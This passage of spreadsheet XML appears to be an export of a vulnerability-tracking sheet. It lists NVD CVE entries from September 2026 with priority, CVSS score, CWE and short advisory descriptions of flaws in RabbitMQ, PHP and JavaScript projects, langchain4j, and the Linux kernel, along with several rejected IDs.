      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66078</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="inlineStr"/>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K433" s="5" t="inlineStr"/>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q433" s="5" t="inlineStr"/>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S433" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15 and 4.0.20 and 4.1.11 and 4.2.6, protected tag bypass via bulk-delete. dELETE /api/users/:name refuses to delete users tagged protected (rabbitmgmtwmuser:deleteresource/2 checks isprotecteduser). POST /api/users/bulk-delete iterates the supplied username list and calls rabbitauthbackendinternal:deleteuser/2 directly , that function has no protected-tag check , so the guard is silently An administrator can delete protected-tagged service accounts via the bulk endpoint, bypassing a safeguard the test suite confirms is rabbitmqmanagement enabled Attacker has the administrator tag A protected-tagged user. This issue is fixed in versions 3.13.15 and 4.0.20 and 4.1.11 and 4.2.6.</t>
        </is>
      </c>
      <c r="T433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66078</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97884</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="inlineStr"/>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q434" s="5" t="inlineStr"/>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S434" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This impacts an unknown function of the file updatestudent.php of the component Student Update Functionality. The manipulation of the argument eno results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97884</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97868</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="inlineStr"/>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q435" s="5" t="inlineStr"/>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S435" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in sheshbabu zen up to 1.5.0. Affected by this issue is the function dangerouslySetInnerHTML of the file features/notes/NotesEditor.jsx of the component Note Editor. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97868</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97869</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="inlineStr"/>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q436" s="5" t="inlineStr"/>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="S436" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in langchain4j up to 1.5.3-beta10/1.11.10-beta18/1.18.1-beta27. This vulnerability affects the function AgenticScopeSerializer.fromJson of the file AgenticScopeJsonSerializationIT.java of the component LangChain4j-agentic. This manipulation causes deserialization. Remote exploitation of the attack is possible. The attack's complexity is rated as high. It is stated that the exploitability is difficult. The exploit has been published and may be used. Upgrading to version 1.5.3-beta11, 1.11.10-beta19 and 1.18.1-beta28 is able to resolve this issue. Upgrading the affected component is advised. The project maintainer kindly explains: "The issue was reported to us privately on 23 July 2026 and fixed in releases published on 29 July 2026. It is tracked as GHSA-gmwr-7wmf-mrjm. Exploitation requires an application to have enabled AgenticScope persistence, which is opt-in, and an attacker who can already write to that store. All maintained release lines have been patched."</t>
        </is>
      </c>
      <c r="T436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97869</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100070</t>
        </is>
      </c>
      <c r="D437" s="5" t="inlineStr"/>
      <c r="E437" s="5" t="inlineStr"/>
      <c r="F437" s="5" t="inlineStr"/>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="inlineStr"/>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q437" s="5" t="inlineStr"/>
      <c r="R437" s="5" t="inlineStr"/>
      <c r="S437" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_nat_sip: rewind offset when NAT shrinks the packet
sashiko says:
 If map_addr() changes the packet length, such as when the public NAT IP
 string is shorter or longer than the internal IP, coff will still point to
 the offset relative to the pre-mangled packet.
 If the packet shrinks, coff could overshoot the correct position,
 potentially causing the next ct_sip_parse_header_uri() call to silently
 skip bytes and miss subsequent Contact headers. Could this lead to a
 failure to NAT those subsequent headers and leak internal network details?</t>
        </is>
      </c>
      <c r="T437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100070</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100071</t>
        </is>
      </c>
      <c r="D438" s="5" t="inlineStr"/>
      <c r="E438" s="5" t="inlineStr"/>
      <c r="F438" s="5" t="inlineStr"/>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="inlineStr"/>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q438" s="5" t="inlineStr"/>
      <c r="R438" s="5" t="inlineStr"/>
      <c r="S438" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: hsr: free learned nodes on device setup failure
hsr_dev_finalize() can fail after a lower-device RX handler has
already been registered (slave A is added before the failable slave B
and interlink adds). RX handlers run in softirq regardless of the
master's state, so frames received in that window can learn dynamic
nodes into node_db, and the error unwind never releases them.
Free both owned dynamic databases in the unwind, mirroring
hsr_dellink(). proxy_node_db is provably empty on every current error
exit (only interlink RX feeds it, and the interlink add is the last
failable step) and is freed for symmetry. The order is safe:
hsr_del_port() unregisters each RX handler with synchronize_net()
before hsr_del_nodes() runs, which removes remaining entries with
list_del_rcu() and defers their release with call_rcu() for readers
already under RCU.</t>
        </is>
      </c>
      <c r="T438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100071</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100072</t>
        </is>
      </c>
      <c r="D439" s="5" t="inlineStr"/>
      <c r="E439" s="5" t="inlineStr"/>
      <c r="F439" s="5" t="inlineStr"/>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="inlineStr"/>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q439" s="5" t="inlineStr"/>
      <c r="R439" s="5" t="inlineStr"/>
      <c r="S439" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: platform: Use acpi_bus_get_primary_device()
The acpi_get_first_physical_node() usage in acpi_platform_fill_resource()
and acpi_create_platform_device() is generally unsafe because in theory
the device returned by it may be freed at any time [1].
It is also inefficient because acpi_get_first_physical_node() is called
multiple times for the same argument which can be avoided.
Address these issues by using acpi_bus_get_primary_device() instead of
acpi_get_first_physical_node() and adjusting the code to call it just
once at the beginning of and acpi_create_platform_device() and drop
the device reference acquired by it upon the return from that function.</t>
        </is>
      </c>
      <c r="T439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100072</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100073</t>
        </is>
      </c>
      <c r="D440" s="5" t="inlineStr"/>
      <c r="E440" s="5" t="inlineStr"/>
      <c r="F440" s="5" t="inlineStr"/>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="inlineStr"/>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q440" s="5" t="inlineStr"/>
      <c r="R440" s="5" t="inlineStr"/>
      <c r="S440" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: fix transaction overflow during writeback
Commit 95ad8ee45cdb ("ext4: correct the reserved credits for extent
conversion") was correct to note that we need to reserve enough credits
for all extents possibly underlying a large folio. However it was too
eager to reduce the number of reserved credits. Extent conversion may
not only need to touch several leaf extent blocks, it may also need to
split extents - for example a single large unwritten extent may need to
be split into many small written ones in case of sparse folio dirtying.
This can thus result not only in extent leaf modifications but also in a
need to allocate new extent tree nodes. As a result the reserved
transaction credits were not sufficient in some corner cases. Use
ext4_meta_trans_blocks() for correct upper bound credit estimate.</t>
        </is>
      </c>
      <c r="T440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100073</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100074</t>
        </is>
      </c>
      <c r="D441" s="5" t="inlineStr"/>
      <c r="E441" s="5" t="inlineStr"/>
      <c r="F441" s="5" t="inlineStr"/>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="inlineStr"/>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q441" s="5" t="inlineStr"/>
      <c r="R441" s="5" t="inlineStr"/>
      <c r="S441" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark bpf_refcount field as unique
BPF_REFCOUNT is not marked as a unique field, while it should be. Fix
this oversight.</t>
        </is>
      </c>
      <c r="T441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100074</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100076</t>
        </is>
      </c>
      <c r="D442" s="5" t="inlineStr"/>
      <c r="E442" s="5" t="inlineStr"/>
      <c r="F442" s="5" t="inlineStr"/>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="inlineStr"/>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q442" s="5" t="inlineStr"/>
      <c r="R442" s="5" t="inlineStr"/>
      <c r="S442" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: rtl8723bs: fix xmit_frame/xmit_buf leaks on mgnt-frame error paths
issue_beacon(), issue_probersp() and issue_asocrsp() obtain a management
xmit_frame together with its xmit_buf from the driver's fixed-size
management-TX pools via alloc_mgtxmitframe(). On the normal path the frame
is handed to dump_mgntframe(), which transfers ownership and eventually
returns both objects to their pools (the frame and, for beacons, the buf
in rtl8723bs_mgnt_xmit(); other bufs via the pending-xmitbuf/TX-completion
path).
Several error/edge paths return early after a successful
alloc_mgtxmitframe() but before dump_mgntframe(), so ownership is never
transferred and neither object is freed:
  - issue_beacon(): beacon larger than 512 bytes
  - issue_probersp(): cur_network-&gt;ie_length &gt; MAX_IE_SZ
  - issue_probersp(): kzalloc() of the SSID scratch buffer fails
  - issue_asocrsp(): pkt_type is neither ASSOCRSP nor REASSOCRSP
Because alloc_mgtxmitframe() removes the frame and buf from their free
lists (list_del_init) without placing them on any pending list, an
orphaned pair is on no list and referenced by nobody, so it is only
reclaimed at driver teardown. Repeated hits progressively exhaust the
management-TX pools until alloc_mgtxmitframe() returns NULL and the
interface can no longer send beacons or probe/assoc responses.
Free the frame and buffer on these paths, matching the existing correct
error handling in issue_assocreq().</t>
        </is>
      </c>
      <c r="T442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100076</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100077</t>
        </is>
      </c>
      <c r="D443" s="5" t="inlineStr"/>
      <c r="E443" s="5" t="inlineStr"/>
      <c r="F443" s="5" t="inlineStr"/>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="inlineStr"/>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q443" s="5" t="inlineStr"/>
      <c r="R443" s="5" t="inlineStr"/>
      <c r="S443" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/msm: Recover HW before retire hung submit
During recovery, it is not safe to retire the hung submit before we
recover the GPU. Retiring the submit triggers BO free and that can
result in GPU pagefaults since the GPU may be actively accessing those
BOs.
To fix this, retire the submits after gpu recovery is complete in
recover_worker().
Patchwork: https://patchwork.freedesktop.org/patch/730655/</t>
        </is>
      </c>
      <c r="T443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100077</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100078</t>
        </is>
      </c>
      <c r="D444" s="5" t="inlineStr"/>
      <c r="E444" s="5" t="inlineStr"/>
      <c r="F444" s="5" t="inlineStr"/>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="inlineStr"/>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q444" s="5" t="inlineStr"/>
      <c r="R444" s="5" t="inlineStr"/>
      <c r="S444" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: mei: pass correct argument to function
The first argument to iwl_mei_write_cyclic_buf() should be the cldev
but the q_head pointer is passed instead. Fix it.</t>
        </is>
      </c>
      <c r="T444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100078</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100079</t>
        </is>
      </c>
      <c r="D445" s="5" t="inlineStr"/>
      <c r="E445" s="5" t="inlineStr"/>
      <c r="F445" s="5" t="inlineStr"/>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="inlineStr"/>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr"/>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q445" s="5" t="inlineStr"/>
      <c r="R445" s="5" t="inlineStr"/>
      <c r="S445" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: typec: ucsi: unregister debugfs entries on teardown
ucsi_register() creates per-instance debugfs entries, but
ucsi_unregister() keeps them around until ucsi_destroy().
Drivers like ucsi_glink that unregister/register the same UCSI
instance across remoteproc restart then try to create an already
existing debugfs directory and log:
  debugfs: 'pmic_glink.ucsi.0' already exists in 'ucsi'
Unregister debugfs entries as part of ucsi_unregister(), and
clear ucsi-&gt;debugfs after freeing it so repeated unregister
paths remain safe.</t>
        </is>
      </c>
      <c r="T445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100079</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45234</t>
        </is>
      </c>
      <c r="D446" s="5" t="inlineStr"/>
      <c r="E446" s="5" t="inlineStr"/>
      <c r="F446" s="5" t="inlineStr"/>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="inlineStr"/>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q446" s="5" t="inlineStr"/>
      <c r="R446" s="5" t="inlineStr"/>
      <c r="S446" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45234</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45235</t>
        </is>
      </c>
      <c r="D447" s="5" t="inlineStr"/>
      <c r="E447" s="5" t="inlineStr"/>
      <c r="F447" s="5" t="inlineStr"/>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="inlineStr"/>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q447" s="5" t="inlineStr"/>
      <c r="R447" s="5" t="inlineStr"/>
      <c r="S447" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45235</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45236</t>
        </is>
      </c>
      <c r="D448" s="5" t="inlineStr"/>
      <c r="E448" s="5" t="inlineStr"/>
      <c r="F448" s="5" t="inlineStr"/>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="inlineStr"/>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
